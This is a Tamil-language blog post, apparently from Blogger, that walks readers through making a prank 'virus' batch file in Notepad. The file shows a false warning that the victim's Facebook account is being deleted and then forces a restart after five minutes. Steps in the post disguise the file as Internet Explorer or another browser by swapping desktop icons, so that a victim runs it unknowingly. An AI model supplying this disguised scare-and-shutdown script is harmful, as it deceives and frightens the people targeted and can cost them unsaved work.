நான் இதற்கு முந்திய ஒரு பதிவிலும் வைரஸ் உருவாகுவது பற்றி பார்த்தோம் .நான் இப்போது இடப்போகும் இடுகைஎவ்வாறு சில கட்டளைகளைக்கொண்டு நமது Notepad ல் Facebook க்கான virus ஐ உருவாக்குவது என்பதை பற்றி.
1.Notepad ஐ திறந்து அதில்
1.Notepad ஐ திறந்து அதில்
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT
WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."
என type செய்க
2. அதை Internet Explorer .bat ஆக பதியவும்.
3. Internet Explorer .bat இல் Right click செய்து Create Shortcut ஐ click செய்யவும்.
4. உங்களது shortcut ல் Right click செய்து Properties ஐ click செய்யவும்.
5. அதன் Icon ஐ மாற்றவும்.
6. Internet Explorer, icon ஐ தெரிவுசெய்து click OK, click APPLY.
7. உங்களது Desktop ல் உள்ள Internet explorer, Icon ஐ அழித்து விட்டு உங்கள் icon ஐ
Replace செய்யவும். இனி யாரவது Internet explorer ஐ திறந்தால் எப்படி ஒரு
தகவல் வந்து உங்கள் கணணி அணைந்துவிடும்.
குறிப்பு :-Internet Explorer .batஎன்பதற்கு பதிலாக நீங்கள் விரும்பிய உலாவின் பெயரை கொடுக்கலாம் (EX mozilla fire fox,google chrome,safari,maxthon.)போன்ற உலவிகளின் பெயரையும் கொடுக்கலாம் கொடுத்து .bat என சேமிக்கவும்
0 $type={blogger}:
Post a Comment